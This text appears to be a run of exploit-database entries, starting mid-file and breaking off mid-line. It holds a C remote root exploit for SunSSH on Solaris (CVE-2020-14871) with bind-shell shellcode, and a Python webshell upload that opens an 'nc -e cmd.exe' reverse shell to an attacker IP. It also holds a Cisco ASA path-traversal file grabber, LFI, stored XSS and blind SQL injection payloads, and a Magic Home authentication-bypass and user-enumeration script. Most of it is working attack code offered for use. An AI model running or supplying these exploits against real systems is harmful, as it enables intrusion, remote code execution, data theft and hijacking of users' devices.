"\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x2a\x95"}, {"Solaris x86 bindshell tcp port 8080", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x44\x60"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 9999", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" "\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" "\x9f\x56\x1b\x2c\xdf\x8f"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 4444", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" "\x0a\x39\x6b\xeb\x53\x6b"} }; void spawn_shell(int sd) { #define sockbuflen 2048 int rcv; char sockbuf[sockbuflen]; fd_set readfds; memset(sockbuf,0,sockbuflen); snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); write(sd,sockbuf,strlen(sockbuf)); while (1) { FD_ZERO(&readfds); FD_SET(0,&readfds); FD_SET(sd,&readfds); select(255,&readfds,NULL,NULL,NULL); if (FD_ISSET(sd, &readfds)) { memset(sockbuf,0,sockbuflen); rcv = read(sd,sockbuf,sockbuflen); if (rcv <= 0) { printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m"); exit(-1); } printf("%s",sockbuf); fflush(stdout); } if(FD_ISSET(0,&readfds)) { memset(sockbuf,0,sockbuflen); read(0,sockbuf,sockbuflen); write(sd,sockbuf,strlen(sockbuf)); } } } void bindshell_setup(short port){ oldsd = sd; sd = socket(AF_INET,SOCK_STREAM,0); sain.sin_port = htons(port); if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ printf("[!] fatal bind shell failed\n\e[0m"); exit(-1); } printf("[-] connected.. enjoy :)\e[0m\n"); spawn_shell(sd); } void on_alarm(int signum){ printf("[+] exploit success, handling payload...\n"); if(ishell==0||ishell==2){ bindshell_setup(9999); } if(ishell==1||ishell==3){ bindshell_setup(8080); } printf("[-] exploit complete\n\e[0m"); exit(0); } void on_interrupt(int signum){ printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); if(sd){ close(sd); } if(oldsd){ close(oldsd); } exit(0); } void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ #define payload_size 4096 int len = strlen(payload); buf = malloc(payload_size); char randchar = 'A'; char* randbuf = malloc(2); if(!buf||!randbuf){ printf("[!] fatal payload buffer error\n"); exit(-1); } srand(time(NULL)); memset(buf,'\x00',payload_size); memset(randbuf,0,2); printf("[-] shellcode length %d bytes\n",len); if(len < 512 && payload_size > 1024){ memcpy(buf,payload,len); for(int i =0;i <= (512 - len);i++){ randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; memcpy(randbuf,&randchar,1); strcat(buf,randbuf); } len = strlen(retaddr); printf("[-] rop chain length %d\n",len); if(len + 512 < payload_size){ memcpy((void*)(long)buf+512,(void*)retaddr,len); len = strlen(buf); printf("[-] exploit buffer length %d\n",len); } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { int i = 0; signal(SIGALRM, &on_alarm); printf("[+] entering keyboard-interactive authentication.\n"); printf("[-] number of prompts: %d\n", num_prompts); printf("[-] prompt %d from server: '", i); fwrite(prompts[i].text, 1, prompts[i].length, stdout); printf("'\n"); prepare_payload(); //uncomment to pause for gdb debugging //sleep(10); responses[i].text = strdup(buf); responses[i].length = strlen(buf); printf("[-] sending exploit magic buffer... wait\n"); alarm(5); } int main(int argc,char **argv){ int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; char* host; int i, type, exitcode; unsigned long hostaddr; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; char *exitsignal = (char *)"none"; size_t len; LIBSSH2_KNOWNHOSTS *nh; static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 'x'}, {"help", 0, 0,'h'} }; printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); while(rc != -1) { rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); switch(rc) { case -1: break; case 's': if(ihost==0){ host = malloc(strlen(optarg) + 1); if(host){ sprintf(host,"%s",optarg); ihost = 1; } } break; case 'p': port = atoi(optarg); break; case 'x': if(ishell==-1) { rc = atoi(optarg); switch(rc){ case 0: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 1: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 2: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 3: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; default: printf("[!] Invalid shellcode selection %d\n",rc); exit(0); break; } } break; case 't': if(itarg==0){ rc = atoi(optarg); switch(rc){ case 0: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 1: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 2: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 3: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 4: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; default: printf("[!] Invalid target selection %d\n", rc); exit(0); break; } itarg = 1; } break; case 'h': printf("[!] Usage instructions.\n[\n"); printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]); printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n"); printf("[ --shellcode|-x <shellcode#>\n[\n"); printf("[ Target#'s\n"); for(i = 0;i <= targetno - 1;i++){ printf("[ %d \"%s\"\n",i,targets[i]); } printf("[\n[ Shellcode#'s\n"); for(i = 0;i <= shellno - 1;i++){ printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); } printf("\e[0m"); exit(0); break; default: break; } } if(itarg != 1 || ihost != 1 || ishell < 0){ printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); exit(-1); } rc = libssh2_init(0); hostaddr = inet_addr(host); sd = socket(AF_INET, SOCK_STREAM, 0); sain.sin_family = AF_INET; sain.sin_port = htons(port); sain.sin_addr.s_addr = hostaddr; if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "[!] failed to connect!\n"); goto shutdown; } session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); if(rc) { printf("[!] failure establishing ssh session: %d\n", rc); goto shutdown; } nh = libssh2_knownhost_init(session); if(!nh) { printf("[!] failure on libssh2 init\n"); goto shutdown; } fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("[+] ssh host fingerprint: "); for(i = 0; i < 20; i++) { printf("%02x", (unsigned char)fingerprint[i]); } printf("\n"); libssh2_knownhost_free(nh); signal(SIGINT,&on_interrupt); libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); printf("[!] exploit failed, core maybe on target!\n"); shutdown: if(sd){ close(sd); } printf("\e[0m"); return -2; }

# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-14-12 # Exploit Author: Andrea Bruschi - www.andreabruschi.net # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 / Xampp Server and Wamp Server #!/usr/bin/python3 import requests import sys import os import iterm2 import AppKit url = sys.argv[1] mobile = sys.argv[2] password = sys.argv[3] # CONFIGURE HERE reverse_ip = '192.168.xx.xx' reverse_port = 4444 # CONFIGURE HERE # SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL netcat_path = '/local/path/to/nc.exe' shell_path = '/local/path/to/shell.php' def login(url, mobile, password): url = "{}/user/login.php".format(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) cookie = req.cookies['PHPSESSID'] return cookie def upload(url, cookie, file=None): f = open(file, 'rb') filename, ext = os.path.splitext(file) if "exe" in ext: content_type = 'application/octet-stream' else: content_type = 'application/x-php' cookie = {'PHPSESSID':cookie} url = "{}/user/marriage-reg-form.php".format(url) files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''} req = requests.post(url, data=payload, cookies=cookie, files=files) print(f'[+] File {ext} uploaded') def get_remote_file(url, ext): url = "{}/user/images".format(url) req = requests.get(url) junk = req.text.split(ext)[0] f = junk[-42:] + ext return f def persistence(url, webshell, netcat): # webshell payload_w = "copy /y {} shell.php".format(webshell) url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w) req_w = requests.get(url_w) # netcat payload_n = "copy /y {} nc.exe".format(netcat) url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n) req_n= requests.get(url_n) print('[+] Persistence enabled') def get_reverse(url, ip, port): payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port) url_r = "{}/user/images/shell.php?cmd={}".format(url, payload) print('[+] Reverse shell incoming!') req = requests.get(url_r) # CONFIGURE HERE # THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER # YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY def start_listener(port): # Launch the app AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2") async def main(connection): app = await iterm2.async_get_app(connection) window = app.current_window if window is not None: cmd = "nc -lnv {}".format(port) await window.async_create_tab(command=cmd) else: print("No current window") iterm2.run_until_complete(main) if __name__ == "__main__": if len(sys.argv < 3): print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>") else: cookie = login(url, mobile, password) upload(url, cookie, netcat_path) upload(url, cookie, shell_path) webshell = get_remote_file(url, '.php') netcat = get_remote_file(url, '.exe') persistence(url, webshell, netcat) start_listener(reverse_port) get_reverse(url, reverse_ip, reverse_port)

# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC) # Date: December 14, 2020 # Exploit Author: Carter Yagemann # Vendor Homepage: https://www.gegl.org # Software Link: https://www.gegl.org/babl/ # Version: libbabl 0.1.62 and newer # Tested on: Debian Buster (Linux 4.19.0-9-amd64) # Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c /* * Babl has an interesting way of managing buffers allocated and freed using babl_malloc() * and babl_free(). This is the structure of its allocations (taken from babl-memory.c): * * typedef struct * { * char *signature; * size_t size; * int (*destructor)(void *ptr); * } BablAllocInfo; * * * signature is used to track whether a chunk was allocated by babl, and if so, whether * it is currently allocated or freed. This is done by either pointing it to the global * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44). * * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173): * * void * babl_free (void *ptr, * ...) * { * ... * if (freed == BAI (ptr)->signature) * fprintf (stderr, "\nbabl:double free detected\n"); * * * Or so the developers think. As it turns out, because babl internally uses libc's malloc() * and free(), which has its own data that it stores within freed chunks, most systems will * overwrite babl's signature variable upon freeing, breaking the double free detection. * The simple PoC below demonstrates this: */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <babl/babl-memory.h> int main(int argc, char **argv) { void *buf = babl_malloc(42); babl_free(buf); // BUG: reports an "unknown" pointer warning when the following is clea= rly a double free babl_free(buf); return 0; }

# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion # Exploit Author: İsmail BOZKURT # Date: 2020-12-15 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Windows 10 x86_64 Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=index Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00 Note: php version < 5.3.3 section class="content"> <div class="container-fluid"> <?php $page = isset($_GET['page']) ? $_GET['page'] : 'home'; if(!file_exists($page.".php")){ include '404.html'; }else{ include $page.'.php'; } ?>

# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) # Date: 12 Dec 2020 # Exploit Author: Freakyclown@cygenta.co.uk # Vendor Homepage: cisco.com # Software Link: It’s against Hardware, specifically ASA’s and FTD’s # Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1) # Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14 # CVE : CVE-2020-3452 # Github : https://github.com/cygenta/CVE-2020-3452 import requests # Written by freakyclown for @CygentaHQ # Cisco ASA Path Traversal # CVE-2020-3452 # Usage: CVE-2020-3452.py {target}" # Example: CVE-2020-3452.py 192.168.0.12" # Requires - Requests - pip3 install requests # # This tool takes advantage of the above cve and attempts to # download files as listed below, it is suggested that you make # a working folder for the outputfiles to avoid confusion if # attacking mutliple ASA's # set your target target = input("Enter target IP/Url: ") def grabstuff(): for file in files: print("trying: ", file) #set request parameters params = ( ('type', 'mst'), ('textdomain', '+CSCOE+/'+file), ('default-language', ''), ('lang', '../'), ) # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False) # write the file to the disk f = open(file,"w") f.write(response.text) f.close() # this is a list of files available to download, more will be added in time # if anyone has a list of ASA files, I'd be happy to add here files = { "sess_update.html", "blank.html", "noportal.html", "portal_ce.html", "portal.html", "logon_custom.css", "svc.html", "logo.gif", "portal_inc.lua", "nostcaccess.html", "session.js", "portal.js", "portal_custom.css", "running.conf", "tlbrportal_forms.js", "logon_forms.js", "win.js", "portal.css", "lced.html", "pluginlib.js", "useralert.html", "ping.html", "app_index.html", "shshimdo_url", "session_password.html", "relayjar.html", "relayocx.html", "color_picker.js", "color_picker.html", "cedhelp.html", "cedmain.html", "cedlogon.html", "cedportal.html", "portal_elements.html", "commonspawn.js", "common.js", "appstart.js", "relaymonjar.html", "relaymonocx.html", "cedsave.html", "tunnel_linux.jnlp", "ask.html", "no_svc.html", "preview.html", "cedf.html", "ced.html", "logon_redirect.html", "logout.html", "tunnel_mac.jnlp", "gp-gip.html", "auth.html", "wrong_url.html", "logon.html"} # obvious thing is obvious, try the things and barf if fail try: grabstuff() except Exception as err: print("Something went wrong sorry") print(err)

# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting # Date: 13-12-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://getgrav.org/ # Software Link: https://getgrav.org/downloads # Version: Grav v1.6.30 - Admin v1.9.18 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/sagarbanwa/ Step to reproduce : 1) log in to the grav-admin panel 2) Go to Pages 3) Click on Add 4) It will ask to Add Page 5) fill the following details as below Page Title : <script>alert(1337)</script> Folder Name : sagar_Banwa Parent Page : /(root) Page Template : Default Value : yes 6) click on the Save button 7) now Click on Pages again. 8) your page name will be listed as <script>alert(1337)</script> 9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up ------------------------------------- POST /grav-admin/admin/pages HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 230 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/grav-admin/admin/pages Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22} Upgrade-Insecure-Requests: 1 data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f -----------------------------

# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection # Date: 2020-12-15 # Exploit Author: Frederic ADAM # Author contact: contact@fadam.eu # Vendor Homepage: https://www.prestashop.com # Software Link: https://github.com/PrestaShop/productcomments # Version: 4.2.0 # Tested on: Debian 10 # CVE : CVE-2020-26248 http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL] Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)

# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass # Google Dork: NA # Date: 22 October 2020 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2020-27199/ # Vendor Homepage: http://www.zengge.com/appkzd # Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en # Version: 1.5.1 (REQUIRED) # Tested on: Android 10 ## Enumeration ## import requests import json import os from colorama import init from colorama import Fore, Back, Style import re ''' 1. First Stage Authentication 2. Second Stage Enumerate 3. Third Stage Remote Execute ''' global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] } data = json.dumps(array) headersOn = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } print (Fore.WHITE + "[+] Sending Payload ...") response = requests.post(urlOn, data=data, headers=headersOn) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On") else: print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71240fa4","macAddress":target} ] } data = json.dumps(array) headersOff = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } print (Fore.WHITE + "[+] Sending Payload ...") response = requests.post(urlOff, data=data, headers=headersOff) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off") else: print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001" data = { "userID":"<Valid Registered Email/Username>", "password":"<Valid Registered Password>", "clientID":"" } headersAuth = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } # First Stage Authenticate os.system('clear') print (Fore.WHITE + "[+] Authenticating ...") response = requests.post(urlAuth, json=data, headers=headersAuth) resJsonAuth = response.json() token = (resJsonAuth['token']) # Second Stage Enumerate print (Fore.WHITE + "[+] Enumerating ...") macbase = "C82E475DCE" macaddress = [] a = ["%02d" % x for x in range(100)] for num in a: macaddress.append(macbase+num) with open('loot.txt', 'w') as f: for mac in macaddress: urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001" params = { "macAddress":mac } headersEnum = { "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Content-Type": "application/json; charset=utf-8", "Accept": "application/json", "token": token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } response = requests.get(urlEnum, params=params, headers=headersEnum) resJsonEnum = response.json() data = (resJsonEnum['data']) if not data: pass elif data: found_macaddresses.append(mac) print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}") f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n") else: print (Fore.RED + "[-] No results found!") print(Style.RESET_ALL) if not found_macaddresses: print (Fore.RED + "[-] No MAC addresses retrieved") elif found_macaddresses: attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL) if (attackboolean.upper() == 'Y'): target = input(Fore.RED + "Enter 